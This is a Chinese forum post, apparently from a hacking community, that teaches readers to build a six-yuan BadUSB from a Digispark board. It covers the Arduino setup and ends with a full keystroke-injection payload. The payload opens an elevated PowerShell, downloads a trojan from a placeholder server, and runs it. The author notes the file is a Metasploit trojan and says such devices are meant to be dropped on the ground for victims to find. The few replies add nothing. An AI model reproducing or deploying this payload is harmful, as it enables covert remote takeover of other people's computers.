查看: 107|回复: 4

【Badusb】6元钱制作Badusb教程

[复制链接]

1

主题

4

帖子

6

积分

初学乍练|UID:1024174

资源币:23

Ⅴ币:41

云币:0

我的勋章
发表于 2020-2-2 17:32:21 | 显示全部楼层 |阅读模式
本帖最后由 guapichen 于 2020-2-2 17:47 编辑

  在公司前一段时间了解了一些社工类产品,其中的U盘引起了我的注意,于是在网上查阅了许多资料完成制作。以下为关于Badusb的知识和制作教程:
1、概述
     2014年美国黑帽大会上,安全研究人员JakobLell和独立安全研究人员Karsten Nohl展示了他们称为“BadUSB”的攻击方法,这种攻击方法让USB安全和几乎所有和USB相关的设备(包括具有USB端口的电脑)都陷入相当危险的状态。

2、Badusb内部结构
   QQ截图20200202162539.jpg
在这张图中便可以了解到Badusb和普通的U盘并没有什么两样,因此迷惑性极高,很容易攻击成功。

3、Badusb Hid攻击原理
   HID是Human Interface Device的缩写,由其名称可以了解HID设备是直接与人交互的设备。一般来讲针对HID的攻击主要集中在键盘鼠标上,因为只要控制了用户键盘,基本上就等于控制了用户的电脑。攻击者会把攻击隐藏在一个正常的鼠标键盘中,当用户将含有攻击向量的鼠标或键盘,插入电脑时,恶意代码会被加载并执行。简而言之,今天要介绍的Badusb利用的是虚拟键盘来实现恶意代码的执行。

4、常见的Badusb开发板
[size=18.6667px]  (1)Teensy
       timg (1).jpg

  (2)Arduino Leonardo

             u=4243957966,313772929&fm=26&gp=0.jpg
      (3)Digispark

       timg.jpg
综上,基本Teensy和Arduino Leonardo价格在50-200rmb之间,那么作为一个使用方法大多为撒在地上、一次性的黑客工具来说,成本是一个很大的问题,那么今天就来介绍一款只需要几块钱就能买到的BadUSB——Digispark,淘宝搜索Digispark即可。


5、环境配置
安装 Arduino 的 IDE:https://www.arduino.cc/en/Main/Software
根据自己的操作系统下载并安装。
打开Arduino应用程序,点击“文件”菜单并选择“首选项”


       QQ图片20200202165711.jpg

在附加开发板管理器网址内填入并点击确定
http://digistump.com/package_digistump_index.json
       QQ截图20200202165844.jpg
进入“工具”菜单,然后选择“开发板”子菜单 - 选择“开发板管理器”。


      QQ图片20200202170317.png

然后在搜索框中搜索“Digistump AVR Boards”,然后点击安装(这里安装速度较慢)。

    QQ图片20200202170659.png (我这已经安装过了)

安装完成后,就可以在开发板中看到Digispark了。选择默认的Digispark (Default - 16.5mhz)。

QQ图片20200202170919.jpg

环境配置完成之后就可以写入payload了。

6、Payload
#include "DigiKeyboard.h"
void setup() {
  // put your setup code here, to run once:
DigiKeyboard.delay(1000);//延时1秒
DigiKeyboard.sendKeyStroke(KEY_R, MOD_GUI_LEFT);//按下win+r键
DigiKeyboard.delay(500);
DigiKeyboard.println("cmd");//输入"cmd"并确认
DigiKeyboard.delay(500);
DigiKeyboard.println("cmd.exe /T:01 /K mode CON: COLS=16 LINES=1");//缩小cmd窗口
DigiKeyboard.delay(300);
DigiKeyboard.println("powershell.exe -command start-process powershell -verb runAs");//以管理员身份运行powershell
DigiKeyboard.delay(2000);
DigiKeyboard.sendKeyStroke(KEY_ARROW_LEFT);//按下左箭头
DigiKeyboard.sendKeyStroke(KEY_ENTER);//按下回车
DigiKeyboard.delay(1000);
DigiKeyboard.println("$P = nEW-oBJECT sYSTEM.nET.wEBcLIENT");
DigiKeyboard.println("$P.dOWNLOADfILE('HTTP://XXX/Shell.exe','D:\\ceshi.exe')");//从服务器上下载木马到D盘
DigiKeyboard.delay(500);
DigiKeyboard.println("D:\\ceshi.exe");//启动木马
DigiKeyboard.delay(500);
DigiKeyboard.println("exit");//退出
DigiKeyboard.delay(500);
DigiKeyboard.sendKeyStroke(KEY_F4, MOD_ALT_LEFT);//按下ALT+F4

}

void loop() {
  // put your main code here, to run repeatedly:

}
总结
  上述为利用kali中的msf生成的木马,从远端服务器下载并执行控制电脑的代码,将上述的XXX该为自己的服务器IP即可,具体服务器搭建和msf木马生成因时间原因就先不写了,本人也是一个小白,教程也是参考了他人,文中也可能出现错误,希望大家多多指正,不要喷

u=1860403769,2583029445&fm=26&gp=0.jpg
这个人还没有留下签名~~~~
回复

使用道具 举报

1

主题

4

帖子

6

积分

初学乍练|UID:1024174

资源币:23

Ⅴ币:41

云币:0

我的勋章
 楼主| 发表于 2020-2-2 17:32:55 | 显示全部楼层
文章许多内容有点BUG,请见谅

点评

这不叫bug,图床有点问题而已,不影响使用  详情 回复 发表于 2020-2-2 19:18
这个人还没有留下签名~~~~
回复

使用道具 举报

60

主题

70

帖子

160

积分

超级版主|UID:4

资源币:181

Ⅴ币:415

云币:100

我的勋章
发表于 2020-2-2 19:18:22 | 显示全部楼层
guapichen 发表于 2020-2-2 17:32
文章许多内容有点BUG,请见谅

这不叫bug,图床有点问题而已,不影响使用
没有你做不到的事情,只有你自己想不到罢了
回复

使用道具 举报

0

主题

11

帖子

3

积分

初学乍练|UID:1024197

资源币:11

Ⅴ币:21

云币:0

我的勋章
发表于 2020-2-17 21:25:24 | 显示全部楼层
混脸熟略略略
这个人还没有留下签名~~~~
回复

使用道具 举报

 成长值: 736

0

主题

20

帖子

83

积分

官方团队|UID:8

资源币:158

Ⅴ币:669

云币:0

我的勋章
发表于 2020-2-22 15:22:56 | 显示全部楼层
已收藏
这个人还没有留下签名~~~~
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

QQ|小黑屋|PayHelp ( 苏ICP备19067019号-1 )

GMT+8, 2020-4-7 04:32

Powered by PayHelp 社区 X3.4本站部分资源来自互联网搜集,由PayHelp整理发布,若侵犯了你的合法权益请联系我们!

© 2017-2019 PayHelp Inc.

快速回复 返回顶部 返回列表